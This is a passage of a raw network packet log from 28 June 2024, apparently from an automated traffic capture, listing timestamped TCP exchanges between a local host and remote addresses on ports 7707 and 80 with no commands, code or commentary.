                                                                  Jun 28, 2024 11:19:24.082204103 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.082237959 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.082250118 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.082262039 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.082298040 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.086973906 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.086986065 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.086997032 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.087007999 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.087018013 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.087023973 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.087034941 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.087040901 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.087065935 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.094587088 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.099822044 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.099883080 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.105010033 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604332924 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604420900 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604432106 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604466915 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.604470015 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604486942 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604510069 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.604700089 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604712009 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604738951 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.604783058 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604793072 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604803085 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.604820967 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.604840040 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.605550051 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.605618000 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.605633974 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.605665922 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.605684042 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.605729103 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.606219053 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.606280088 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.606290102 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.606343031 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.607095957 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607105970 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607116938 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607127905 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607182980 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.607186079 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607197046 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607208014 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607224941 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.607249975 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.607907057 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607963085 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.607973099 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.608005047 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.608077049 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.608087063 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.608125925 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.608813047 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.608855009 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.608871937 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.608882904 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.608925104 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.608966112 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.608982086 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.609035015 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.609630108 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.609687090 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.609697104 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.609730959 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.609776020 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.609785080 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.609826088 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.610503912 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.610547066 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.610557079 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.610568047 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.610610962 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.611012936 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.611063957 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.611108065 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.611449957 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.611459970 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.611469984 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.611500978 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.611535072 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.611543894 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.611572981 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.612270117 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.612289906 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.612299919 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.612324953 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.612340927 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.612705946 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.612723112 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.612771988 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.688426018 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688585043 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688606977 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688621998 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688630104 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.688632011 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688642025 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688652039 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688662052 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.688662052 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688684940 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.688723087 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.688898087 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688906908 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688916922 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688925982 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688935995 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688945055 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.688956976 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.688991070 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.694729090 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.694740057 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.694746971 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.694772959 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.694850922 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.694958925 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695003986 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695014954 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695046902 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695152998 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695163965 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695179939 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695190907 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695203066 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695231915 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695333004 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695343971 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695379972 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695503950 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695517063 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695527077 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695538044 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695549965 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695555925 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695560932 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695575953 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695604086 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695847034 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695859909 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695872068 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695883036 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695903063 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695923090 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695930004 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695965052 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.696779966 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696799994 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696810961 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696867943 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.696960926 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696973085 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696984053 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696995020 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697000980 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697037935 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697154999 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697165966 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697176933 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697189093 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697202921 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697220087 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697356939 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697369099 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697379112 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697397947 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697422028 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697499990 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697511911 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697526932 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697563887 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697655916 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697666883 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697678089 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697690964 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697731018 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.699604988 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.699664116 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.699675083 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.699702978 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.699707985 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.699748039 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700561047 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700601101 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700617075 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700638056 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700723886 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700736046 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700747013 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700757980 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700762033 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700786114 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700948954 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700959921 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700970888 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700983047 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700989962 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700995922 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701009989 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701036930 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701163054 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701174021 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701185942 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701221943 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701586008 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701625109 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701647043 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701658964 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701695919 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701723099 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701736927 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701773882 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.702369928 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.702389002 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.702425003 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.391511917 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.395083904 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.396699905 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:25.396758080 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.401576996 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:25.401658058 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.401985884 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:25.402534962 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.407855034 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:26.352910042 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:26.353595018 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:26.353755951 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:26.353811026 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:26.358397961 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:27.519640923 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:27.522324085 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:27.524451017 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:27.527478933 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:27.527554035 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.354628086 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.359544039 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.359610081 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.364399910 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.492472887 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.540635109 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.620266914 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.687274933 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.723648071 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.743194103 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.748106956 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.748262882 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.753057957 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.753809929 CEST6478880192.168.2.4104.16.184.241
                                                                  Jun 28, 2024 11:19:38.758728981 CEST8064788104.16.184.241192.168.2.4
                                                                  Jun 28, 2024 11:19:38.758799076 CEST6478880192.168.2.4104.16.184.241
                                                                  Jun 28, 2024 11:19:38.758981943 CEST6478880192.168.2.4104.16.184.241
                                                                  Jun 28, 2024 11:19:38.763967037 CEST8064788104.16.184.241192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818356991 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818427086 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818439960 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818486929 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818531990 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818550110 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818561077 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818572044 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818588018 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818603039 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818785906 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818798065 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818808079 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818820000 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818833113 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818865061 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818967104 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818978071 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818989038 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819000006 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819011927 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819020987 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819025040 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819051981 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819221020 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819232941 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819242954 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819253922 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819263935 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819281101 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819288969 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819314003 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819458008 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819468021 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819478035 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819488049 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819498062 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819504023 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819526911 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819763899 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819773912 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819780111 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819792032 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819802046 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819813013 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819818020 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819823980 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819834948 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819844961 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819863081 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.820162058 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820173025 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820183039 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820194006 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820204020 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820207119 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.820215940 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820226908 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820234060 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.820281029 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.820456982 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820467949 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820477009 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820504904 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.825174093 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.825185061 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.825222969 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.825249910 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.825262070 CEST77074973994.232.249.111192.168.2.4
